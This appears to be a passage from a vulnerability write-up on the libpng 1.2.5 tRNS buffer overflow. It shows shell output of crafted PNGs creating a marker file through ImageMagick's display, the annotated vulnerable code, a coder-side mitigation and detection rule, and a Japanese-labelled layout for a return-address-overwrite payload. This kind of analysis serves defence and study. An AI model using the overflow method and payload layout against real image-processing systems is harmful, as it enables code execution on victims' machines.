/tmp$ ls -la /tmp/itworked ls: /tmp/itworked: No such file or directory /tmp$ LD_PRELOAD="/home/katsuhiro/apps/libpng/libpng-1.2.5//libpng12.so" ./display_arm ./ex.png ./display_arm: /home/katsuhiro/apps/libpng/libpng-1.2.5//libpng12.so: no version information available (required by /usr/lib/libMagick.so.6) /tmp$ ls -la /tmp/itworked -rw-r--r-- 1 a users 0 Aug 22 12:11 /tmp/itworked
/tmp$ ls -la /tmp/itworked ls: /tmp/itworked: No such file or directory /tmp$ LD_PRELOAD="./libpng12.so.0" /tmp/display /tmp/exploit_i386.png /tmp/display: ./libpng12.so.0: no version information available (required by /usr/lib/libMagick.so.6) /tmp$ ls -la /tmp/itworked -rw-r--r-- 1 a a 0 Aug 15 02:34 /tmp/itworked
/*
  Excerpt from libpng 1.2.5's tRNS chunk handling (the enclosing handler,
  readbuf's declaration and its fixed size are not shown here).

  The length-vs-palette check lives only in the else-branch, so when no PLTE
  chunk has been seen yet the handler merely warns and falls through with
  'length' still unbounded; png_crc_read() below then copies a
  sender-controlled number of bytes into the fixed-size readbuf, which is the
  overrun this page demonstrates. Later libpng releases bound 'length' before
  the read. A consumer-side mitigation is to promote the "Missing PLTE before
  tRNS" warning to a hard error in the png_warning callback, and a reasonable
  detection rule is a PNG whose tRNS chunk precedes PLTE or whose tRNS length
  exceeds the palette size.
*/
if (!(png_ptr->mode & PNG_HAVE_PLTE))
{
  /* Should be an error, but we can cope with it */
  png_warning(png_ptr, "Missing PLTE before tRNS");
}
else if (length > (png_uint_32)png_ptr->num_palette) //[!]
{
  /* Only reached when PLTE was seen: the no-PLTE path skips this bound. */
  png_warning(png_ptr, "Incorrect tRNS chunk length");
  png_crc_finish(png_ptr, length);
  return;
}
if (length == 0)
{
  png_warning(png_ptr, "Zero length tRNS chunk");
  png_crc_finish(png_ptr, length);
  return;
}
/* 'length' is unchecked against sizeof readbuf on the no-PLTE path. */
png_crc_read(png_ptr, readbuf, (png_size_t)length); //[!]
png_ptr->num_trans = (png_uint_16)length;
/*
  libpng warning callback used by the PNG coder (its registration via
  png_set_error_fn is outside this excerpt).

  Ordinary warnings are logged when image->debug is set and then surfaced as
  a CoderWarning on the image's exception. The one special case is libpng's
  "Missing PLTE before tRNS" warning: in libpng 1.2.5 that path skips the
  tRNS length check, so the handler escalates it to png_error(), which hands
  control to libpng's error path (longjmp by default) and is not expected to
  return here. That escalation is the coder-side mitigation for the
  unchecked tRNS read.

  ping:    libpng read struct; its error pointer is assumed to be the Image
           being decoded and is not NULL-checked here (confirm at the
           png_set_error_fn call site).
  message: libpng's warning text, passed through verbatim as the exception
           message.
*/
static void PNGWarningHandler(png_struct *ping,png_const_charp message)
{
  Image
    *image;

  /* Escalate before touching image; png_error() does not return normally. */
  if (LocaleCompare(message, "Missing PLTE before tRNS") == 0) //[!]
    png_error(ping, message); //[!]
  image=(Image *) png_get_error_ptr(ping);
  if (image->debug != MagickFalse)
    (void) LogMagickEvent(CoderEvent,GetMagickModule(),
      " libpng-%s warning: %s", PNG_LIBPNG_VER_STRING, message);
  (void) ThrowMagickException(&image->exception,GetMagickModule(),CoderWarning,
    message,image->filename);
}
0x: [適当なデータ] 0x: [攻撃で使うデータ] 0x: [mov r5, pc] <- この地点の pc からの相対位置(r5 に入れる)で攻撃に用いるデータを参照する 0x: [攻撃コード] 0x: [上書きするリターンアドレスの値]
[r5]